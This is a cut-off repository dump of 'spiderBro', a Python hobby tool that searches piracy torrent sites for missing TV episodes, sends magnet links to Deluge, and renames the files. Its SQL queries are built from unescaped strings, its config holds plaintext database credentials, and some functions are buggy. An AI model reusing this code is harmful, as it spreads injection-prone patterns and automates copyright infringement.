[ { "alpha_fraction": 0.565805196762085, "alphanum_fraction": 0.5704439878463745, "avg_line_length": 36.914573669433594, "blob_id": "0ea7c3877e0f75c08732a46fd888c4040230a3bc", "content_id": "6285330caed8704b71a6685386223cfe914d5de5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7545, "license_type": "no_license", "max_line_length": 180, "num_lines": 199, "path": "/file_renamer.py", "repo_name": "GrahamOMalley/spiderBro", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\nimport sys \nfrom datetime import datetime\nimport os\nimport shutil\nimport sqlite3\nimport subprocess\nimport fnmatch\nimport logging\nimport gomXBMCTools\n\n##########\nprint('os.cwd:')\nprint(os.getcwd())\n\nprint('file (arg[0]):')\nprint(sys.argv[0])\n\n# its [0] of the split statement\nprint('file dir (arg[0]):')\nprint(os.path.split(sys.argv[0]))\n##########\n\ndbfile = \"/home/gom/code/python/spider_bro/spiderbro.db\" \nlogdir= \"/home/gom/log/spiderbro\"\ntarget = \"/media/nasGom/video/tv/\"\nid = sys.argv[1]\nname = sys.argv[2]\npath = sys.argv[3]\nstart_time = str(datetime.today()).split(\".\")[0].replace(\" \", \"_\")\nstart_day = str(datetime.today()).split(\" \")[0]\n\nlogger = logging.getLogger('filerenamer')\nformatter = logging.Formatter('[%(asctime)s] [%(levelname)s] %(message)s')\nhandler_stream = logging.StreamHandler()\nhandler_stream.setFormatter(formatter)\nhandler_stream.setLevel(logging.CRITICAL)\nlogger.addHandler(handler_stream)\nhandler_file = logging.FileHandler('%s/spiderBro_%s.log' % (logdir, start_day))\nhandler_file.setFormatter(formatter)\nlogger.addHandler(handler_file)\nlogger.setLevel(logging.INFO)\nlogger.info('')\nlogger.info('File Renamer Started...')\nlogger.info('Target Dir to write files is: %s' % target)\n\nlogger.info('Torrent id is: %s' % sys.argv[1])\nlogger.info('Torrent name is: %s' % sys.argv[2])\nlogger.info('Torrent save path is: %s' % sys.argv[3])\n#sys.exit()\n\ndef is_video_file(filename, extensions=['.avi', '.mkv', '.mp4', '.flv', '.divx', '.mpg', '.mpeg', '.wmv']):\n return any(filename.lower().endswith(e) for e in extensions)\n\ndef findInPath(prog):\n for path in os.environ[\"PATH\"].split(os.pathsep):\n exe_file = os.path.join(path, prog)\n if os.path.exists(exe_file) and os.access(exe_file, os.X_OK):\n return exe_file\n return False\n\ndef unrar(filePath):\n unrarprog = \"unrar\"\n if unrarprog:\n rardir=os.path.dirname(filePath)\n command=[unrarprog,'e',filePath]\n logger.info(\"Unrar: Extracting %s\" % filePath)\n r = subprocess.Popen(command, cwd=rardir,shell=False).wait()\n if r == 0:\n logger.info(\"Unrar: Extracted %s\" % filePath)\n else:\n logger.info(\"Unrar: Error exctracting %s\" % filePath)\n else:\n logger.info(\"Unrar: Unable to find unrar executable\")\n\n\nif (not os.path.exists(dbfile)):\n logger.info(\"cannot find db...\")\n sys.exit()\nelse:\n files_to_copy = []\n # spiderbro stores path\n conn = sqlite3.connect(dbfile)\n cur = conn.cursor()\n sname = path\n select = \"select * from urls_seen where savepath like \\\"%\" + sname + \"%\\\"\"\n logger.info( \"Retrieving ep info with query: %s\" % (select))\n for c in(cur.execute(select)):\n file_path = path+\"/\"+name\n file_to_copy = path+\"/\"+name\n logger.info(\"Filepath: %s\" % (file_path))\n if(not os.path.isdir(file_path)):\n # we just have a single video file, copy\n files_to_copy.append(file_path)\n else:\n # we have a dir and are not sure whats in it, do some file manipulation before copying\n\n # 'Sample' files screw up logic if they are not deleted first\n logger.info( \"Checking for sample...\")\n for root, dirs, files in os.walk(file_path):\n for dirname in fnmatch.filter(dirs, \"*Sample*\"):\n logger.info( \"Sample dir detected, deleting... \", dirname)\n shutil.rmtree(os.path.join(root,dirname))\n\n # walk dir, find any zip or rar\n logger.info( \"Checking for archives...\")\n for pattern in (\"*.zip\", \"*.rar\"):\n for root, dirs, files in os.walk(file_path):\n for filename in fnmatch.filter(files, pattern):\n # extract files\n archive_file = ( os.path.join(root, filename))\n logger.info( archive_file)\n if pattern == \"*.rar\":\n logger.info( \"trying to unrar...\")\n unrar(archive_file)\n else:\n # TODO: implement unzip\n logger.info( \"trying to unzip\")\n \n logger.info( \"Checking for video files...\")\n # walk dir, find any video files \n for root, dirs, files in os.walk(file_path):\n for vfilename in filter(is_video_file, files):\n logger.info( \"Found file: %s\" % (vfilename))\n files_to_copy.append( os.path.join(root, vfilename))\n\n # use creation logic from backup_tv.py to mv and rename episode\n s = \"0\" + str(c[1]) if(int(c[1])<10) else str(c[1])\n season_dir = \"season_\" + s\n series_name = gomXBMCTools.normaliseTVShowName(str(c[0]))\n\n if not os.path.isdir(target + series_name): \n logger.info( \"\\tDirectory: %s does not exist, creating...\" % (series_name))\n os.mkdir(target+series_name)\n \n if not os.path.isdir(target + series_name + \"/\" + season_dir):\n logger.info( \"\\tDirectory: %s does not exist, creating...\" % (season_dir))\n os.mkdir(target + series_name + \"/\" + season_dir)\n \n rmdir = True\n for f in files_to_copy:\n e = \"e0\" + str(c[2]) if(int(c[2])<10) else \"e\" + str(c[2])\n # TODO: this is broken\n if( c[2] == -1): \n e = gomXBMCTools.getEpisodeNumFromFilename(f, s)\n\n if( e != \"e-1\" ):\n fileName, fileExtension = os.path.splitext(f)\n ftarget = target + series_name + \"/\" + season_dir + \"/\" + series_name + \"_s\"+ s + e + fileExtension\n logger.info( \"---> Copying File: %s to %s\" % (f, ftarget))\n shutil.copy2(f, ftarget)\n else:\n logger.info(\"Copying file without renaming: %s\" % (f))\n ftarget = target + series_name + \"/\" + season_dir + \"/\" \n shutil.copy2(f, ftarget)\n #rmdir = False\n if rmdir:\n logger.info(\"Cleaning up temporary dir %s\" % (path))\n shutil.rmtree(path)\n\n from deluge.ui.client import client\n from twisted.internet import reactor, defer\n from deluge.log import setupLogger\n setupLogger()\n\n def printSuccess(dresult, is_success, smsg):\n print \"[+]\", smsg\n\n def printError(emsg):\n print \"[e]\", emsg\n\n def printReport(rresult):\n print rresult\n\n def dl_finish(result):\n print \"All deferred calls have fired, exiting program...\"\n client.disconnect()\n # Stop the twisted main loop and exit\n reactor.stop()\n\n def on_connect_fail(result):\n print \"Connection failed!\"\n print \"result:\", result\n\n def on_connect_success(result):\n print \"Connection was successful!\"\n torrent_id = id\n tlist = []\n successmsg = \" Removed\"\n errormsg = \"Error removing\"\n do_remove_data = False\n tlist.append(client.core.remove_torrent(torrent_id, do_remove_data).addCallbacks(printSuccess, printError, callbackArgs = (True, successmsg), errbackArgs = (errormsg)))\n defer.DeferredList(tlist).addCallback(printReport)\n defer.DeferredList(tlist).addCallback(dl_finish)\n\n d = client.connect()\n d.addCallback(on_connect_success)\n d.addErrback(on_connect_fail)\n reactor.run()\n" }, { "alpha_fraction": 0.6197232007980347, "alphanum_fraction": 0.620415210723877, "avg_line_length": 34.24390411376953, "blob_id": "b76732acb291b4c2d8b585d90de8c1380c098612", "content_id": "c4de47cd388634ccd16c22907237d926195b5005", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2890, "license_type": "no_license", "max_line_length": 113, "num_lines": 82, "path": "/spiderBro.py", "repo_name": "GrahamOMalley/spiderBro", "src_encoding": "UTF-8", "text": "#! /usr/bin/python\n#################################################################################################################\n#\n# Script to scan thetvdb.com for series info, compare list of episodes to the xbmc\n# mysql DB, and attempt to download missing torrents from piratebay/btjunkie\n# using the deluge rpc interface\n#\n#################################################################################################################\nimport socket\nfrom datetime import datetime\nfrom spiderBroAPI import *\n\nstartTime = datetime.now()\ne_masks = [SNEN, NxN, NNN]\ns_masks = [Season, Series]\nignore_taglist = [\"SWESUB\", \"SPANISH\", \"GERMAN\", \"HBOGO\"]\nsearch_list = [PirateBaySearch]\nsearch_list = [KATSearch]\n#search_list = [ExtraTorrentSearch]\nsocket.setdefaulttimeout(10)\n\n# Get our config file and script arguments\nscript_args = get_configuration()\n\n# Get an instance of spiderBro, tell it to search for torrents\nspider = SpiderBro(script_args, e_masks, s_masks, ignore_taglist, search_list)\ntorrent_download_list = spider.get_torrent_download_list()\n\n# Deferred callbacks for twisted\ndef on_connect_fail(result):\n \"\"\"\n Deferred callback function to be called when an error is encountered\n \"\"\"\n l = logging.getLogger('spiderbro')\n l.info(\"Connection failed!\")\n l.info(\"result: %s\" % result)\n sys.exit()\n\n\ndef on_connect_success(result):\n \"\"\"\n Deferred callback function called when we connect\n \"\"\"\n d = db_manager()\n l = logging.getLogger('spiderbro')\n init_list = []\n l.info(\"Connection to deluge was successful, result code: %s\" % result)\n # need a callback for when torrent added completes\n def add_tor(key, val):\n l.info(\"---> Added Torrent: %s\" % (val))\n \n for tp in torrent_download_list:\n di = {'download_location':tp['save_dir']}\n # added support for magnet links\n if(str(tp[\"url\"]).startswith(\"magnet:\")):\n df = client.core.add_torrent_magnet(tp[\"url\"], di).addCallback(add_tor, tp[\"url\"])\n else:\n df = client.core.add_torrent_url(tp[\"url\"], di).addCallback(add_tor, tp[\"url\"])\n init_list.append(df)\n #add url to database - ideally would be nice to do this in callback, but dont have info there?\n d.add_to_urls_seen(tp['showname'], tp['season'], tp['episode'], tp['url'], tp['save_dir'])\n\n dl = defer.DeferredList(init_list)\n dl.addCallback(dl_finish)\n\ndef dl_finish(result):\n \"\"\"\n Deferred callback function for clean exit\n \"\"\"\n l = logging.getLogger('spiderbro')\n l.info(\"All deferred calls have fired, exiting program...\")\n client.disconnect()\n # Stop the twisted main loop and exit\n reactor.stop()\n\n# Connect to a daemon running on the localhost\nd = client.connect()\nd.addCallback(on_connect_success)\nd.addErrback(on_connect_fail)\n\n# Run the twisted main loop to make everything go\nreactor.run()\n" }, { "alpha_fraction": 0.7625418305397034, "alphanum_fraction": 0.7692307829856873, "avg_line_length": 22, "blob_id": "38a35f6e9a442eeb9f89fc739fbd8c0ca95d2a3e", "content_id": "1c55c7368af93980e4c302c1df289bca075e3d48", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 299, "license_type": "no_license", "max_line_length": 54, "num_lines": 13, "path": "/config.ini", "repo_name": "GrahamOMalley/spiderBro", "src_encoding": "UTF-8", "text": "[spiderbro]\ndb_file: /home/gom/code/python/spider_bro/spiderbro.db\nforce_learn: False\nlog_dir: /home/gom/log/spiderbro\nscan_all_shows_xbmc: True\ntv_dir: /media/nasGom/.torrents_temp/\nxbmc_sqlite_db: test.db\nfilerenamer: True\nmysql: True\nhost: localhost\nuser: xbmc\npwd: xbmc\nschema: MyVideos78\n" }, { "alpha_fraction": 0.6060941815376282, "alphanum_fraction": 0.6382271647453308, "avg_line_length": 40.022727966308594, "blob_id": "dfe3d4a0d7a8e21bbbff025739f9b9b914cf880e", "content_id": "9dd79f9a4c96d89f09e00ec30e3423174d94ee16", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1805, "license_type": "no_license", "max_line_length": 116, "num_lines": 44, "path": "/testdriver.py", "repo_name": "GrahamOMalley/spiderBro", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\n#from sb_utils import *\nimport sys\nimport urllib2\n\nif __name__ == \"__main__\":\n \"\"\"\n quick little testing script to see behaviour of search classes and test individual episodes/seasons\n \"\"\"\n# e_masks = [NxN, sNeN, NNN]\n# s_masks = [season, series]\n# search_list = [piratebaysearch, btjunkiesearch, isohuntsearch]\n# tags = [\"SWESUB\", \"SPANISH\"]\n# opts = {\"use_debug_logging\":True, \"log_dir\":\"log\"}\n\n #log = get_sb_log(opts)\n\n #base = base_search()\n #base.search(\"Game of Thrones\", \"1\", \"3\", sNeN, tags, True)\n \n #p = piratebaysearch()\n #result = p.search(\"Girls\", \"2\", \"2\", sNeN, tags, True)\n #if result: log.info(\"\\t\\tFound Torrent: %s\" % result)\n\n #i = isohuntsearch()\n #result = i.search(\"The Office (US)\", \"8\", \"17\", sNeN, tags, False)\n #print e.search_url\n #if result: log.info(\"\\t\\tFound Torrent: %s\" % result)\n \n #e = extratorrentsearch()\n #result = e.search(\"The Office (US)\", \"8\", \"17\", sNeN, tags, False)\n #print e.search_url #if result: log.info(\"\\t\\tFound Torrent: %s\" % result)\n\n #proxy_support = urllib2.ProxyHandler({})\n #opener = urllib2.build_opener(proxy_support)\n #urllib2.install_opener(opener)\n #response = urllib2.urlopen(\"http://extratorrent.cc/search/?search=downton+abbey&new=1&x=0&y=0\")\n request = urllib2.Request(\"https://kickass.unblocked.pw/usearch/marvels%20agents%20of%20S.H.I.E.L.D.%20s02e10/\")\n request.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')\n request.add_header('User-Agent', \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0\")\n request.add_header('Accept-Language', \"en-US,en;q=0.5\")\n response = urllib2.urlopen(request)\n search_page = response.read()\n print search_page\n" }, { "alpha_fraction": 0.5199472904205322, "alphanum_fraction": 0.523421585559845, "avg_line_length": 40.31683349609375, "blob_id": "3c3a47cd83d5f24b2198fd087170d5795d9bb30c", "content_id": "66058be802890c983acd0c26accea030fd23b03d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8347, "license_type": "no_license", "max_line_length": 194, "num_lines": 202, "path": "/db_manager.py", "repo_name": "GrahamOMalley/spiderBro", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\nimport MySQLdb\nimport logging\nimport os\nimport sqlite3\nimport sys\n\nclass db_manager:\n \"\"\" A python singleton \"\"\"\n class __impl:\n \"\"\" Implementation of the singleton interface \"\"\"\n def __init__(self):\n \"\"\" Base Constructor\"\"\"\n self.log = logging.getLogger('spiderbro')\n\n self.sb_db_file = \"\"\n self.CREATE_SB_SCHEMA = False\n self.SB_DB_INITIALIZED = False\n \n self.XBMC_DB_INITIALIZED = False\n\n self.mysqlparms = {}\n self.USING_MYSQL = False\n\n self.xbmc_sqlite_file = \"\"\n self.log.info(\"DB Manager Initialized\")\n\n # setup internal sqlite db\n def init_sb_db(self, filename):\n \"\"\" Create internal sqlite db if it does not already exist\"\"\"\n\n self.sb_db_file = filename\n self.CREATE_SB_SCHEMA = not os.path.exists(self.sb_db_file)\n\n if self.CREATE_SB_SCHEMA:\n conn = sqlite3.connect(self.sb_db_file)\n self.log.debug('Internal db does not exist, Creating Schema...')\n conn.execute(\"\"\"create table if not exists shows (series_id INT PRIMARY KEY, showname TEXT unique, finished INT default 0, is_anime INT default 0, high_quality INT default 0)\"\"\")\n conn.execute(\"\"\"create table if not exists urls_seen (showname TEXT, season INT, episode INT, url TEXT, savepath TEXT)\"\"\")\n conn.close()\n else:\n self.log.debug('Database exists, assume schema does, too.')\n \n self.SB_DB_INITIALIZED = True\n \n # get a connection to the internal db\n def sb_db_get_conn(self):\n try:\n if self.SB_DB_INITIALIZED:\n conn = sqlite3.connect(self.sb_db_file)\n return conn\n else:\n self.log.error(\"Cannot execute, sb_db not initialized\")\n return None\n except Exception, e:\n self.log.error(\"SQLite Error: %s\" % e)\n\n # perform an insert/update/etc\n def sb_db_set(self, stat):\n try:\n if self.SB_DB_INITIALIZED:\n con = sqlite3.connect(self.sb_db_file)\n con.execute(stat)\n con.commit()\n con.close()\n #self.log.debug(\"\\tDATABASE: %s\" % stat)\n else:\n self.log.error(\"Cannot execute, sb_db not initialized\")\n except Exception, e:\n self.log.error(\"SQLite Error: %s\" % e)\n\n # wrapper for select queries, since theres about 5-6 of them\n def sb_select(self, cols, tname, whereclause=\"\"):\n list = []\n statement = \"select \" + \", \".join(cols) + \" from \" + tname + whereclause\n #self.log.debug(\"\\tDATABASE: %s\" % statement)\n if self.SB_DB_INITIALIZED:\n conn = sqlite3.connect(self.sb_db_file)\n cur = conn.cursor()\n cur.execute(statement)\n for c in cur:\n list.append(c)\n cur.close()\n conn.close()\n return list\n else:\n self.log.error(\"SB DB has not been initialized\")\n\n def get_show_info(self, sname):\n return self.sb_select([\"series_id\", \"finished\"], \"shows\", \" where showname = \\\"%s\\\"\" % sname)\n\n def get_show_high_quality(self, sname):\n res = self.sb_select([\"high_quality\"], \"shows\", \" where showname = \\\"%s\\\"\" % sname)\n is_hq = False\n if res:\n if res[0][0] == 1: is_hq = True\n return is_hq\n\n def get_ignore_list(self):\n list = self.sb_select([\"showname\"], \"shows\", \" where finished = 1\")\n ret_list = []\n for i in list:\n ret_list.append(i[0])\n return ret_list\n\n def get_eps_from_self(self, sname):\n return self.sb_select([\"season\", \"episode\"], \"urls_seen\", \" where showname = \\\"%s\\\"\" % sname)\n\n def mark_show_finished(self, sname):\n self.sb_db_set(\"\"\"update shows set finished = 1 where showname = \\\"%s\\\" \"\"\" % sname)\n\n def add_show(self, sid, sname, finished):\n self.sb_db_set(\"\"\"insert or replace into shows (series_id, showname, finished) VALUES (\\\"%s\\\",\\\"%s\\\",\\\"%s\\\")\"\"\" % (sid,sname,finished))\n\n def add_to_urls_seen(self, sname, s, e, url, savedir):\n self.sb_db_set(\"\"\"insert into urls_seen (showname,season,episode,url,savepath) VALUES (\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\")\"\"\" % (sname,s,e,url,savedir))\n\n def clear_cache(self, sname):\n self.sb_db_set(\"\"\"delete from urls_seen where showname=\\\"%s\\\"\"\"\" % (sname))\n\n def set_quality(self, sname, qual):\n self.sb_db_set(\"\"\"update shows set high_quality=%d where showname = \\\"%s\\\" \"\"\" % (qual, sname))\n\n def update_series_id(self, sname, id):\n self.sb_db_set(\"\"\"insert or replace into shows (series_id, showname) values (\\\"%s\\\", \\\"%s\\\") \"\"\" % (id, sname))\n\n def xbmc_init_sqlite(self, filename):\n if os.path.exists(filename):\n self.xbmc_sqlite_file = filename\n self.USING_MYSQL = False\n self.XBMC_DB_INITIALIZED = True\n self.log.info(\"Initialized xbmc sqlite db: %s\" % self.xbmc_sqlite_file)\n else:\n self.log.error(\"(FATAL) no xbmc db, exiting...\")\n sys.exit()\n\n def xbmc_init_mysql(self, host, user, passw, schema):\n try:\n # test connection, throw error if not valid\n con = MySQLdb.connect(host, user, passw, schema)\n con.close()\n self.mysqlparms = {\"host\":host, \"user\":user, \"passw\":passw, \"schema\":schema}\n self.USING_MYSQL = True\n self.XBMC_DB_INITIALIZED = True\n self.log.info(\"MySql DB initialized on host: %s for user: %s, using schema: %s\" % (host, user, schema))\n except:\n self.log.error(\"(Fatal) Exception connecting to mysql db, db not initialized\")\n sys.exit()\n \n def xbmc_select(self, query):\n list = []\n try:\n if self.USING_MYSQL:\n con = MySQLdb.connect(self.mysqlparms[\"host\"], self.mysqlparms[\"user\"], self.mysqlparms[\"passw\"], self.mysqlparms[\"schema\"])\n else:\n con = sqlite3.connect(self.xbmc_sqlite_file)\n cur = con.cursor()\n cur.execute(query)\n for c in cur:\n list.append(c)\n cur.close()\n con.close()\n #self.log.debug(\"\\tDATABASE: %s\" % query)\n return list\n \n except Exception, e:\n self.log.error(\"(FATAL) Exception: %s\" % e)\n sys.exit()\n\n def xbmc_get_eps_for_show(self, sname):\n return self.xbmc_select(\"\"\"select c12, c13 from episodeview where strTitle = \\\"%s\\\" order by c12, c13\"\"\" % sname)\n \n def xbmc_get_showlist(self):\n return self.xbmc_select(\"\"\"select distinct strTitle from episodeview order by strTitle\"\"\")\n\n def xbmc_get_series_id(self, sname):\n return self.xbmc_select(\"\"\"select distinct c12 from tvshow where c00 = \\\"%s\\\"\"\"\" %sname)\n\n def get_id(self):\n \"\"\" Test method, return singleton id \"\"\"\n return id(self)\n\n # storage for the instance reference\n __instance = None\n\n def __init__(self):\n \"\"\" Create singleton instance \"\"\"\n # Check whether we already have an instance\n if db_manager.__instance is None:\n # Create and remember instance\n db_manager.__instance = db_manager.__impl()\n\n # Store instance reference as the only member in the handle\n self.__dict__['_db_manager__instance'] = db_manager.__instance\n\n def __getattr__(self, attr):\n \"\"\" Delegate access to implementation \"\"\"\n return getattr(self.__instance, attr)\n\n def __setattr__(self, attr, value):\n \"\"\" Delegate access to implementation \"\"\"\n return setattr(self.__instance, attr, value)\n\n" }, { "alpha_fraction": 0.5560863614082336, "alphanum_fraction": 0.561251163482666, "avg_line_length": 42.81753921508789, "blob_id": "7430086eaf3b64f2acd04a3e2c258b954677d4d1", "content_id": "84d1ef30013a29fdd767f41dc7ea1d15e7996139", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 30979, "license_type": "no_license", "max_line_length": 183, "num_lines": 707, "path": "/spiderBroAPI.py", "repo_name": "GrahamOMalley/spiderBro", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\nimport ConfigParser\nimport argparse\nimport logging\nimport re\nimport string\nimport sys\nimport time\nimport traceback\nimport urllib2\nimport gomXBMCTools\nimport json\n\nfrom BeautifulSoup import BeautifulSoup\nfrom datetime import date\nfrom datetime import datetime\nfrom deluge.log import setupLogger\nfrom deluge.ui.client import client\nfrom twisted.internet import defer\nfrom twisted.internet import reactor\n\nfrom db_manager import db_manager\n\n#####################################################################################\n# Filemasks\n#####################################################################################\n\nclass Season:\n def __init__(self):\n self.descr = \"Season\"\n def mask(self, sn, ep):\n return (\"season %s\" % sn)\n\nclass Series:\n def __init__(self):\n self.descr = \"Series\"\n def mask(self, sn, ep):\n return (\"series %s\" % sn)\n\nclass SNEN:\n def __init__(self):\n self.descr = \"SNEN\"\n def mask(self, sn, ep):\n s = \"s0\" + sn if(int(sn)<10) else \"s\" + sn\n e = \"e0\" + ep if(int(ep)<10) else \"e\" + ep\n return (s+e)\n\nclass NxN:\n def __init__(self):\n self.descr = \"NxN\"\n def mask(self, sn, ep):\n e = \"0\" + ep if(int(ep)<10) else ep\n return (\"%sx%s\" % (sn, e))\n \nclass NNN:\n def __init__(self):\n self.descr = \"NNN\"\n def mask(self, sn, ep):\n e = \"0\" + ep if(int(ep)<10) else ep\n return (\"%s%s\" % (sn, e))\n \n#####################################################################################\n# Searches\n#####################################################################################\nclass BaseSearch:\n def __init__(self):\n self.name = \"Base Search Class\"\n self.delimiter = \" \"\n self.can_get_tor_from_main_page = True\n\n def search(self, series_name, sn, ep, fmask, tags, is_high_qual):\n lg = logging.getLogger('spiderbro')\n series_name = series_name.replace(\"::\", \"\")\n series_name = series_name.replace(\": \", \" \")\n series_name = series_name.replace(\":\", \" \")\n series_name = \"\".join(ch for ch in series_name if ch not in [\"!\", \"'\", \":\"])\n series_name = series_name.replace(\"&\", \"and\")\n m = fmask()\n season_or_ep_str = m.mask(sn, ep)\n ser_list = self.generate_search_terms(series_name)\n is_season = False\n if ep == \"-1\": is_season = True\n for series_search_term in ser_list:\n search_url = self.get_search_url(series_search_term, season_or_ep_str)\n lg.info(\"\\tSearching %s:\\t%s %s \\t\\t(%s)\" % (self.name, series_search_term, season_or_ep_str, search_url))\n try:\n #response = urllib2.urlopen(search_url)\n # TODO: add a headers member to the base search class\n # then have a loop here that builds up the request with the appropriate headers\n # the ones below work for extratorrent, use firefox dev edition to see what headers work on other sites\n request = urllib2.Request(search_url)\n request.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')\n request.add_header('User-Agent', \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0\")\n response = urllib2.urlopen(request)\n search_page = response.read()\n sps = BeautifulSoup(search_page)\n links = sps.findAll('a', href=re.compile(self.get_links_from_main_page_re()))\n for l in links:\n if self.validate_link(series_search_term, season_or_ep_str, l['href'], tags, is_high_qual, is_season):\n if self.validate_page(l['href']):\n if self.can_get_tor_from_main_page:\n return l['href']\n else:\n return self.get_torrent_from_validated_page(l['href'])\n except:\n lg.error(\"Couldn't open %s\" % search_url)\n #lg.error(\"Shutting down sb, check that url is accessible\")\n #sys.exit()\n return \"\"\n\n def get_links_from_main_page_re(self):\n lg = logging.getLogger('spiderbro')\n lg.debug(\"\\tbase: get links from main page using regexp: ^http\")\n return \"^http\"\n\n def get_torrent_from_validated_page(self, page):\n lg = logging.getLogger('spiderbro')\n lg.debug(\"base: get torrent from validated page using regexp: \\\"\\\"\")\n return \"\"\n\n def validate_link(self, series, s_ep_str, link, tags, is_high_q, is_season):\n lg = logging.getLogger('spiderbro')\n # First validate the link title is ok\n is_torrent = re.compile(self.get_is_link_a_torrent_re())\n if(not is_torrent.match(link)):\n return False\n else:\n lg.debug('\\t\\tValidating %s' % (gomXBMCTools.getTorrentNameFromMagnetLink(link)))\n \n if (is_high_q and not ((\"720p\" in link.lower()) or (\"1080p\" in link.lower()))): \n lg.debug(\"\\t\\t\\tValidation FAILED: Quality is HighQ but 720p not found in torrent\")\n return False\n\n if ( not is_high_q and ((\"720p\" in link.lower()) or (\"1080p\" in link.lower()))): \n lg.debug(\"\\t\\t\\tValidation FAILED: Quality is lowQ but 720p found in torrent\")\n return False\n\n for t in tags:\n if t.lower() in link.lower(): \n lg.debug(\"\\t\\t\\tValidation FAILED: tag filter %s found in torrent\" % t)\n return False\n \n if is_season: \n # we are searching for a torrent of an entire season\n s_ep_str = s_ep_str.replace(\" \", self.delimiter).lower()\n if (s_ep_str in link.lower() or (s_ep_str.replace(self.delimiter, self.delimiter+\"0\") in link.lower())):\n return True\n else:\n # we are searching for an episode\n delims = [self.delimiter, \".\"]\n for d in delims:\n if (self.validate_delims(series, s_ep_str, d, link)):\n return True\n else:\n lg.debug(\"\\t\\t\\tValidation FAILED: s_ep_str %s or %s not found in link title\" % (s_ep_str, d.join(series.split(\" \")).lower()))\n \n return False\n\n def validate_delims(self, series, s_ep_str, delim, link):\n if (s_ep_str in link.lower() and d.join(series.split(\" \")).lower() in link.lower()):\n return True\n return False\n\n # child classes can define their own site-specific page validation, see PirateBaySearch for an example\n def validate_page(self, tor):\n lg = logging.getLogger('spiderbro')\n lg.debug(\"\\tbase: validate page (return true)\")\n return True\n\n # break the series name up and try different variations of it \n # eg: \"Blah & Blah (2010)\" -> [\"Blah & Blah (2010)\", \"Blah & Blah\", \"Blah and Blah (2010)\", \"Blah and Blah\"] etc\n def generate_search_terms(self, name):\n regser = re.compile(\" \\([0-9a-zA-Z]{2,4}\\)\").sub('', name)\n li = [name, regser]\n \n hli =[]\n for l in li:\n hyphen = \" \".join(l.split(\"-\"))\n hli.append(hyphen)\n if hli: li.extend(hli)\n\n for l in li:\n hyphen = \" \".join(l.split(\":\"))\n hli.append(hyphen)\n if hli: li.extend(hli)\n\n cli =[]\n for l in li:\n comma = \" \".join(l.split(\",\"))\n cli.append(comma)\n if cli: li.extend(cli)\n\n\n ali =[]\n for l in li:\n ampersand = \"and\".join(l.split(\"&\"))\n ali.append(ampersand)\n if cli: li.extend(ali)\n\n return list(set(li))\n \n def get_search_url(self, name, maskval):\n return \"www.thisisabaseclassyouidiot.com\"\n\n def get_is_link_a_torrent_re(self):\n return \".*torrent$\"\n\n# Child classes need to define self.delimiter, get_search_url and optionally validate_page \nclass PirateBaySearch(BaseSearch):\n def __init__(self):\n self.name = \"piratebay\"\n self.delimiter = \"+\"\n self.can_get_tor_from_main_page = True\n\n def get_is_link_a_torrent_re(self):\n return \"^magnet\"\n\n def get_links_from_main_page_re(self):\n lg = logging.getLogger('spiderbro')\n lg.debug(\"\\tpiratebay: get links from main page using regexp: ^magnet\")\n return \"^magnet\"\n\n def get_search_url(self, name, maskval):\n return \"http://pirateproxy.bz/search/\"+\"+\".join(name.split(\" \")).replace(\"'\",\"\")+\"+\"+\"+\".join(maskval.split(\" \")) + \"/0/7/0\"\n \n def validate_page(self, tor):\n return True\n seeds = 0\n seeds_reg = re.compile(\"Seeders:</dt>\\n<dd>[0-9]{1,9}\")\n lg = logging.getLogger('spiderbro')\n lg.debug(\"\\t\\tDoing piratebay page validation\")\n turl = tor.replace(\"http://torrents.pirateproxy.bz\", \"http://pirateproxy.bz/torrent\")\n resp = urllib2.urlopen(turl)\n html = resp.read()\n data = BeautifulSoup(html)\n details = data.findAll(\"dl\", { \"class\" : \"col2\" })\n # This is ugly as sin, I think beautifulsoup has some problems with <dt> and <dd> tags?\n for d in details: \n try:\n seeds = int(seeds_reg.findall(str(d))[0].replace(\"Seeders:</dt>\\n<dd>\", \"\"))\n except:\n lg.error(\"\\t\\tError parsing seeders for piratebay\")\n if seeds > 0:\n lg.debug(\"\\t\\tValidation passed, torrent has %s seeds...\" % seeds)\n return True\n else:\n lg.debug(\"\\t\\tValidation FAILED, torrent has no seeds...\")\n return False\n\nclass KATSearch(BaseSearch):\n def __init__(self):\n self.name = \"kickasstorrents\"\n self.delimiter = \"+\"\n self.can_get_tor_from_main_page = True\n\n def get_is_link_a_torrent_re(self):\n return \"^magnet\"\n\n def get_links_from_main_page_re(self):\n return \"^magnet\"\n\n def get_search_url(self, name, maskval):\n return \"https://kickass.unblocked.pw/usearch/\" + \" \".join(name.split(\" \")).replace(\"'\",\"\")+\" \"+\" \".join(maskval.split(\" \")) + \"/\"\n\n def validate_page(self, tor):\n lg = logging.getLogger('spiderbro')\n lg.debug(\"\\t\\tDoing KAT page validation for: \"+tor)\n lg.debug(\"\\t\\tNot Implemented: extratorrent page validation, returning true\")\n return True\n\n def get_torrent_from_validated_page(self, page):\n lg = logging.getLogger('spiderbro')\n lg.debug(\"\\t\\tConverting torrent url to kat format : \"+page)\n return \"http://kickass.unblocked.pw/\" + page.replace(\"torrent_\", \"\")\n \n def validate_delims(self, series, s_ep_str, delim, link):\n series = series.replace(\".\",\"+\")\n DEUBGME= delim.join(series.split(\" \")).lower() \n if (s_ep_str in link.lower() and delim.join(series.split(\" \")).lower() in link.lower()):\n return True\n return False\n\nclass ExtraTorrentSearch(BaseSearch):\n def __init__(self):\n self.name = \"extratorrent\"\n self.delimiter = \".\"\n self.can_get_tor_from_main_page = False\n\n def get_links_from_main_page_re(self):\n return 